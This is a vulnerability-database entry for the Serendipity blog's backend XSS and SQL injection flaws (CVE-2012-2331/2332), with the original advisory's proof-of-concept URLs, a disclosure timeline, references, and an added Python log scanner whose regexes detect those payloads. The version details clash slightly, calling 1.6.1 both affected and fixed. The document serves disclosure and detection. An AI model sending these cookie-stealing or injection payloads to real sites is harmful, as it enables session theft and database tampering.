Serendipity Input Validation Vulnerability

Vulnerability ID: 1121112
Vulnerability type: Cross-site scripting
Published: 2012-05-08
Updated: 2012-06-07
CVE ID: CVE-2012-2331
CNNVD ID: CNNVD-201205-155
Platform: PHP
CVSS score: 4.3
|Source
https://www.exploit-db.com/exploits/18884
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201205-155
|Vulnerability Details
Serendipity is a PHP-based blog system developed by the Serendipity team. It supports creating online diaries, blogs, web pages and similar content. Serendipity contains a SQL injection vulnerability and a cross-site scripting vulnerability. An attacker can exploit these vulnerabilities to execute arbitrary script code, steal cookie-based authentication credentials, manipulate the application, access or modify data, or exploit them against the underlying database. These vulnerabilities exist in Serendipity 1.6.1; other versions may also be affected.
|Exploit
Advisory:		Serendipity 1.6 Backend Cross-Site Scripting and SQL-Injection vulnerability
Advisory ID:		KORAMIS-ADV2012-001
Contact:		security@koramis.de
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Serendipity 1.6
Vendor URL:		http://www.s9y.org
Vendor Status:		fixed
CVE-ID:			CVE-2012-2331,CVE-2012-2332

==========================
Vulnerability Description:
==========================

The Serendipity backend is prone to a Cross-Site Scripting and SQL-Injection vulnerability.

==================
Technical Details:
==================

# Cross Site-Scripting (CVE-2012-2331)
http://[target]/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='"</script><script>alert(document.cookie)</script>

# SQL-Injection (CVE-2012-2332)
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+

=========
Solution:
=========

Upgrade to version 1.6.1

====================
Disclosure Timeline:
====================

21-Apr-2012 - informed developers
22-Apr-2012 - feedback from developer
08-May-2012 - fixed in version 1.6.1

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz (KORAMIS Security Team).

===========
References:
===========

http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt
http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html
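The advisory above names two injection points: the `serendipity[textarea]` parameter of `serendipity_admin_image_selector.php` (reflected XSS) and the `serendipity[plugin_to_conf]` parameter of `serendipity_admin.php` (SQL injection). The following Python script is an added example, not code from the advisory or from the Serendipity project: it parses constructed web-server access-log lines, URL-decodes the query string, and flags requests that hit either parameter with markup or SQL metacharacters, which is the check a defender would run over historical logs after applying the 1.6.1 upgrade. The log lines are constructed samples, and the assumption that a plugin identifier never legitimately contains quotes or SQL comment markers is mine, not the project's.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined-log style (not real traffic).
# Lines 2 and 3 carry the URL-encoded forms of the advisory's two proof-of-concept requests.
SAMPLE_LOG = """\
10.0.0.5 - - [08/May/2012:10:00:01 +0000] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=12 HTTP/1.1" 200 5120
10.0.0.9 - - [08/May/2012:10:00:07 +0000] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1%27%20OR%20SLEEP(10)%3D0%20LIMIT%201--+ HTTP/1.1" 200 5120
10.0.0.9 - - [08/May/2012:10:00:12 +0000] "GET /serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=%27%22%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 2048
10.0.0.5 - - [08/May/2012:10:00:20 +0000] "GET /serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=body HTTP/1.1" 200 2048
"""

# Leading fields of a combined-log line up to and including the request line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Injection points named in the advisory: script path -> (parameter, class of flaw).
SINKS = {
    "/serendipity/serendipity_admin_image_selector.php": ("serendipity[textarea]", "xss"),
    "/serendipity/serendipity_admin.php": ("serendipity[plugin_to_conf]", "sqli"),
}

# Markup that has no business in a textarea identifier.
XSS_RE = re.compile(r"<\s*/?\s*script|javascript:|\bon\w+\s*=", re.I)
# Assumption: a plugin identifier never contains quotes, comment markers or SLEEP().
SQLI_RE = re.compile(r"'|--|/\*|\bsleep\s*\(", re.I)


def parse_line(line):
    """Return (client_ip, path, decoded query params) or None for a non-matching line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs percent-decodes values and turns '+' into a space, matching what PHP sees.
    params = parse_qs(parts.query, keep_blank_values=True)
    return m.group("ip"), parts.path, params


def check_request(path, params):
    """Return 'xss', 'sqli' or None for one decoded request."""
    sink = SINKS.get(path)
    if sink is None:
        return None
    name, kind = sink
    for value in params.get(name, []):
        if kind == "xss" and XSS_RE.search(value):
            return "xss"
        if kind == "sqli" and SQLI_RE.search(value):
            return "sqli"
    return None


def scan(log_text):
    """Scan a log body and return (ip, path, finding) tuples in log order."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, params = parsed
        label = check_request(path, params)
        if label:
            findings.append((ip, path, label))
    return findings


if __name__ == "__main__":
    for ip, path, label in scan(SAMPLE_LOG):
        print(f"{label.upper():4} {ip} {path}")
```

Decoding before matching matters: the raw request line only shows `%27` and `%3Cscript%3E`, so a signature applied to the undecoded line misses the obvious characters. Because the check is keyed to the exact script and parameter from the advisory, the benign requests to the same scripts (a numeric plugin id, a plain textarea name) produce no findings.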
|References

Source: github.com
Link: https://github.com/s9y/Serendipity/commit/264bf55719baacc069ff9d3cc35f0c349cde11e3
Source: BID
Name: 53418
Link: http://www.securityfocus.com/bid/53418
Source: www.rul3z.de
Link: http://www.rul3z.de/index.php?/214-KORAMISADV2012-001-Serendipity-1.6-Backend-Cross-Site-Scripting-and-SQL-Injection-vulnerability.html
Source: MLIST
Name: [oss-security] 20120508 Re: CVE request: XSS and SQL injection in serendipity before 1.7.1
Link: http://www.openwall.com/lists/oss-security/2012/05/09/2
Source: MLIST
Name: [oss-security] 20120508 CVE request: XSS and SQL injection in serendipity before 1.7.1
Link: http://www.openwall.com/lists/oss-security/2012/05/08/6
Source: www.koramis.com
Link: http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt
Source: SECUNIA
Name: 49009
Link: http://secunia.com/advisories/49009
Source: blog.s9y.org
Link: http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.html
Source: BUGTRAQ
Name: 20120508 Serendipity 1.6 Backend Cross-Site Scripting and SQL-Injection vulnerability
Link: http://archives.neohapsis.com/archives/bugtraq/2012-05/0037.html